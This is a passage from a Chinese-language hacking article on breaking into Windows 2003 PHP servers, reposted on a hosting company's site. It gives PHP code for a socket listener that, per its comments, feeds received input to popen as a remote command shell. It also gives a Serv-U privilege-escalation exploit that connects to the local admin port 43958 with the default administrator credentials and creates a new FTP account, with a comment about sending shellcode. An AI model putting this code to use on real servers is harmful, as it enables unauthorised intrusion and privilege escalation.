突破Windows 2003 PHP服务器的新思路
| = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n"; } do { if (($msgsock = socket_accept($sock)) < 0) { echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n"; break; } /* Send instructions. */ $msg = "\nWelcome to the PHP Test Server. \n" . "To quit, type ''quit''. To shut down the server type ''shutdown''.\n"; socket_write($msgsock, $msg, strlen($msg)); do { if (false === socket_recv($msgsock, $buf , 1024, 0)) { echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n"; break 2; } if (!$buf = trim($buf)) { continue; } if ($buf == ''quit'') { break; } if ($buf == ''shutdown'') { socket_close($msgsock); break 2; } $talkback = "PHP: You said ''$buf''.\n"; socket_write($msgsock, $talkback, strlen($talkback)); echo "$buf\n"; //以下处理接受到的buf /*eg:例如 $buf=”cmd.exe /c netstat –an”; $pp = popen(''$buf '', ''r''); While($read = fgets($pp, 2096)) echo $read; pclose($pp); */ } while (true); socket_close($msgsock); } while (true); socket_close($sock); ?> 事实上,很多主机都是没有加载php_sockets.dll的,庆幸的是,不需要socket模块支持的“fsockopen”函数已经足够我们使用了。因为只要有“fsockopen”,我们便可以自由地读写本机中未对外部开放的端口。使用fsockopen读写serv-u 的本地管理端口43958 (注: 该端口无法在外部连结) 进行提权便是一个很典型的例子: $adminuser=” LocalAdministrator”; $adminpass=” #l@$ak#.lk;0@P”; $adminport=” 43958”; $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8); if (!$fp) { echo "$errstr ($errno) \n"; } else { //可以写入$shellcode // fputs ($fp, $shellcode); fputs ($fp, "USER ".$adminuser."\r\n"); sleep (1); fputs ($fp, "PASS ".$adminpass."\r\n"); sleep (1); fputs ($fp, "SITE MAINTENANCE\r\n"); sleep (1); fputs ($fp, "-SETUSERSETUP\r\n"); fputs ($fp, "-IP=".$addr."\r\n"); fputs ($fp, "-PortNo=".$ftpport."\r\n"); fputs ($fp, "-User=".$user."\r\n"); fputs ($fp, "-Password=".$password."\r\n"); fputs ($fp, "-HomeDir=".$homedir."\r\n"); fputs ($fp, "-LoginMesFile=\r\n"); fputs ($fp, "-Disable=0\r\n"); fputs ($fp, "-RelPaths=0\r\n"); fputs ($fp, "-NeedSecure=0\r\n"); fputs ($fp, "-HideHidden=0\r\n"); fputs ($fp, "-AlwaysAllowLogin=0\r\n"); fputs ($fp, "-ChangePassword=1\r\n"); fputs ($fp, "-QuotaEnable=0\r\n"); fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n"); fputs ($fp, "-SpeedLimitUp=-1\r\n"); fputs ($fp, "-SpeedLimitDown=-1\r\n"); fputs ($fp, "-MaxNrUsers=-1\r\n"); fputs ($fp, "-IdleTimeOut=600\r\n"); fputs ($fp, "-SessionTimeOut=-1\r\n"); fputs ($fp, "-Expire=0\r\n"); fputs ($fp, "-RatioUp=1\r\n"); fputs ($fp, "-RatioDown=1\r\n"); fputs ($fp, "-RatiosCredit=0\r\n"); |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
